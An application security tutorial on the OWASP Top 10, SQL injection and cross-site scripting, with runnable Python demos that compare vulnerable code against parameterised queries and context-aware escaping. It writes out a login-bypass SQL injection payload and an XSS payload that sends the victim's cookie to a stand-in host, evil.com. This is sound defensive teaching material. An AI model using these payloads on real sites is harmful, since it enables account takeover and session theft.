Application security (AppSec) focuses on finding, fixing, and preventing security vulnerabilities in software. Because web applications are exposed to the whole internet and sit in front of the data attackers want, understanding the common vulnerability classes and the coding practices that prevent them is essential.
The OWASP Top 10 (2021 edition) is the most widely referenced list of critical web application security risks:
| # | Risk | Description |
|---|---|---|
| A01 | Broken Access Control | Users can act outside their intended permissions |
| A02 | Cryptographic Failures | Sensitive data exposed due to weak or missing encryption |
| A03 | Injection | Untrusted data sent to an interpreter (SQL, NoSQL, OS, LDAP); cross-site scripting is grouped here since 2021 |
| A04 | Insecure Design | Missing security controls in the design phase |
| A05 | Security Misconfiguration | Default credentials, open cloud storage, verbose errors |
| A06 | Vulnerable and Outdated Components | Using libraries with known vulnerabilities |
| A07 | Identification and Authentication Failures | Weak authentication, session management flaws |
| A08 | Software and Data Integrity Failures | Insecure CI/CD pipelines, unsigned updates |
| A09 | Security Logging and Monitoring Failures | Insufficient logging, no alerting on suspicious activity |
| A10 | Server-Side Request Forgery (SSRF) | Application fetches URLs controlled by the attacker |
SQL injection occurs when user input is concatenated directly into a SQL string, so the input can change the grammar of the query rather than just its values:
```python
# DANGEROUS — never do this: the input becomes part of the SQL code
query = f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'"
```
An attacker enters `admin' OR '1'='1' --` as the username and leaves the password empty.
This becomes:
```sql
SELECT * FROM users WHERE username = 'admin' OR '1'='1' --' AND password = ''
-- everything after "--" is a comment, so the password check is never evaluated
-- (MySQL requires whitespace after "--"; SQLite and PostgreSQL do not)
```
Because `'1'='1'` is always true, the `WHERE` clause matches every row and the login succeeds without a valid password.
```python
# SAFE — use parameterised queries: the driver sends values separately from the SQL text
# (%s is the placeholder style of psycopg2 / MySQLdb; sqlite3 uses ?)
cursor.execute(
    "SELECT * FROM users WHERE username = %s AND password = %s",
    (username, password)
)
# Note: this fixes the injection, but comparing a plaintext password in SQL is
# still a Cryptographic Failure (A02). Store a salted hash and verify it in application code.
```
| Defence | Description |
|---|---|
| Parameterised queries | Separate SQL code from data |
| ORM | Use an Object-Relational Mapper (e.g., Prisma, SQLAlchemy) |
| Input validation | Allow-list validation of type, length and format as defence in depth; it does not replace parameterisation |
| Least privilege DB accounts | Application DB user should only have required permissions (no DDL, no access to other schemas) so a successful injection does less damage |
| WAF rules | Block common SQL injection patterns; useful as a detective and delaying control, but pattern-based filters are routinely bypassed |
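The following runnable script, added here as an illustration and not part of the original lesson, puts the vulnerable and the parameterised login side by side against an in-memory SQLite database with constructed sample users. It uses SQLite's `?` placeholder rather than the `%s` shown above; the function names and sample data are assumptions for the demo.

```python
import sqlite3

# Constructed sample data for the demo (not from the lesson). Plaintext
# passwords are used only so the SQL comparison in the lesson can be reproduced.
USERS = [
    ("admin", "hunter2"),
    ("alice", "correct horse"),
]

# The payload from the lesson: closes the string, adds an always-true
# condition, and comments out the rest of the WHERE clause.
PAYLOAD = "admin' OR '1'='1' --"


def make_db():
    """Create an in-memory SQLite database with a users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)", USERS
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """DANGEROUS: f-string formatting splices attacker text into the SQL grammar."""
    query = (
        "SELECT id, username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchall()


def login_safe(conn, username, password):
    """SAFE: placeholders keep the values out of the SQL grammar entirely.
    The driver transmits the SQL text and the parameters separately, so a
    quote or comment marker in the input is just data."""
    query = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


def run_demo():
    """Return (rows from vulnerable login, rows from safe login with the payload,
    rows from safe login with real credentials)."""
    conn = make_db()
    vuln_rows = login_vulnerable(conn, PAYLOAD, "")
    safe_rows = login_safe(conn, PAYLOAD, "")
    legit_rows = login_safe(conn, "alice", "correct horse")
    return vuln_rows, safe_rows, legit_rows


if __name__ == "__main__":
    vuln, safe, legit = run_demo()
    print("vulnerable login with payload:", vuln)   # every user is returned
    print("parameterised login with payload:", safe)  # no rows
    print("parameterised login, real creds:", legit)
```

The vulnerable version returns every user, because `OR '1'='1'` matches all rows and the `--` removes the password check; the application would typically log the attacker in as whichever row comes first (here, `admin`). The parameterised version returns nothing for the payload, since it looks for a user whose name is literally `admin' OR '1'='1' --`.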
Cross-site scripting (XSS) lets an attacker inject script into a web page so that it runs in other users' browsers with the privileges of the site's origin (reading cookies, making requests as the victim, rewriting the page):
| Type | Description |
|---|---|
| Stored XSS | Script is stored on the server (e.g., in a database) and served to users |
| Reflected XSS | Script is reflected from a URL parameter in the response |
| DOM-based XSS | Script is executed through client-side JavaScript manipulation |
```html
<!-- Vulnerable: rendering user input directly into HTML without escaping.
     Whether {{ ... }} is unsafe depends on the template engine: Jinja2 and Django
     auto-escape by default, so this becomes exploitable when autoescaping is off
     or a "safe"/raw filter is applied. -->
<p>Welcome, {{ user.name }}</p>
<!-- If user.name = <script>document.location='https://evil.com/steal?c='+document.cookie</script>
     the browser executes the script and sends the victim's cookie to the attacker -->
```
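The following example, added here and not taken from the lesson, shows the same rendering step done unsafely and then with output encoding appropriate to each context. It uses only the standard library (`html.escape`, `json.dumps`); the function names and the attacker-controlled values are constructed for the demo.

```python
import html
import json

# Constructed attacker-controlled value, modelled on the lesson's cookie-theft payload.
PAYLOAD = (
    "<script>document.location='https://evil.com/steal?c='"
    "+document.cookie</script>"
)


def render_unsafe(name):
    """Vulnerable: the value is concatenated into HTML with no escaping,
    so any markup in it becomes part of the page."""
    return f"<p>Welcome, {name}</p>"


def render_safe(name):
    """HTML body context: html.escape() turns <, >, &, ' and " into entities,
    so the browser displays the text instead of parsing it as markup."""
    return f"<p>Welcome, {html.escape(name)}</p>"


def render_attr_safe(name):
    """Attribute context: the quote characters must be escaped too, or the
    value can close the attribute and add an event handler. html.escape's
    quote=True (the default) covers both ' and "."""
    return f'<input name="user" value="{html.escape(name, quote=True)}">'


def render_js_safe(name):
    """JavaScript context: HTML entity escaping is the wrong tool inside a
    <script> block. Serialise the value as a JSON string literal and
    neutralise "</" so it cannot terminate the script element early."""
    literal = json.dumps(name).replace("</", "<\\/")
    return f"<script>var user = {literal};</script>"


if __name__ == "__main__":
    print(render_unsafe(PAYLOAD))
    print(render_safe(PAYLOAD))
    print(render_attr_safe('" onmouseover="alert(1)'))
    print(render_js_safe("</script><script>alert(1)</script>"))
```

The key point is that escaping is context-specific: entity-encoding is correct between tags and inside quoted attributes, but a value placed inside a `<script>` block or a URL needs its own encoding, and a value placed into the DOM via `innerHTML` on the client is a DOM-based XSS sink that server-side escaping does not protect.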